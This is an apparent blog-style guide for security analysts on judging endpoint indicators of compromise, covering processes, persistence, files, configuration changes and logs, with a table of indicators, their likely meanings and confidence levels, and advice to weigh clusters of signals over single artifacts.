An indicator of compromise sounds like a definitive thing — a red flag, a smoking gun, proof. In practice, it's more like a thread you pull on. A single IoC rarely tells you much. It's the combination of signals, their timing, and their relationship to each other that builds an actual picture of what happened.
Here's how to think about endpoint artifacts without jumping to conclusions — and without dismissing things that deserve attention.
What an IoC Actually Is
Functionally, an IoC is any observable artifact that suggests malicious activity may have occurred. The operative word is "may." A process running from a temp directory is suspicious. A process running from a temp directory, establishing an outbound connection to an unknown IP, with a name that resembles a legitimate system binary — that's a coherent story.
IoCs are input to analysis, not the conclusion of it. The analyst's job is to determine whether the observed artifacts are consistent with a malicious campaign or have a benign explanation.
Categories of Endpoint Evidence
Anomalous Processes
Look for processes that don't belong — names that mimic legitimate Windows components with slight variations, processes running from unusual locations (%APPDATA%, %TEMP%, user profile subdirectories), or processes with no visible window and no parent process that makes sense.
Parent-child relationships matter enormously. Microsoft Word spawning PowerShell is a classic malicious pattern. Explorer.exe spawning cmd.exe is common and usually benign. Context is everything.
Persistence Mechanisms
Malware that wants to survive a reboot needs to write itself into the startup sequence. Common locations include registry run keys, the startup folder, scheduled tasks, and service installations. Finding a scheduled task created at 2:17 AM that runs a base64-encoded PowerShell command is not something that requires much debate.
Suspicious Files
Newly created executables in user-writable directories, files with misleading extensions (a .pdf that is actually an .exe, a .docx that contains macros), or large volumes of files with identical timestamps are all worth noting.
Configuration Changes
Disabled Windows Defender, modified host file entries, changed DNS settings, disabled UAC — these are control subversions. They don't prove malicious activity by themselves, but an endpoint with four of these conditions active simultaneously is not a coincidence.
Relevant Log Entries
Event logs are noisy, but certain event IDs deserve immediate attention: account creation outside normal processes, privilege escalation, cleared security logs (the act of clearing logs is itself logged), and authentication failures followed immediately by success.
| Indicator | Possible Interpretation | Confidence Level |
|---|---|---|
Process running from %TEMP% |
Packed/dropped executable | Medium |
| PowerShell with encoded command | Script obfuscation | High |
| Registry Run key pointing to unknown binary | Persistence mechanism | High |
| Outbound traffic to unknown IP on port 443 | C2 communication | Medium |
| VSS deletion via legitimate admin tool | Pre-ransomware preparation | High |
| Large number of files renamed simultaneously | Active encryption | Very High |
| Security log cleared | Active attacker covering tracks | High |
| New local admin account created | Privilege persistence | High |
The Problem With Isolated Indicators
A base64-encoded PowerShell command by itself is not proof of compromise. Administrators run encoded PowerShell commands for legitimate reasons. A single unusual process could be a poorly written installer. One network connection to an unfamiliar IP might be an analytics SDK phoning home.
The threshold for declaring an incident should be based on the cluster of indicators, not any single artifact. The methodology: when you find one suspicious signal, ask what other signals would be present if it were malicious — then go look for them. If you find two or three supporting indicators, the picture shifts considerably.
Limitations You Should Acknowledge
Surface-level analysis has real limits. A sophisticated piece of malware may leave no obvious process artifacts if it injects into a legitimate process. It may use encrypted traffic over common ports that looks like normal HTTPS. The absence of obvious IoCs does not clear a machine — it might just mean you need deeper analysis than a checklist provides.
When the indicators are ambiguous and the stakes are high (executive machine, domain controller, server with access to sensitive data), the answer is escalation or full forensic acquisition — not a judgment call made on incomplete information.
The goal of initial IoC analysis is to make an informed, defensible decision about next steps. That's it. Confirming or ruling out a full compromise is a different level of work.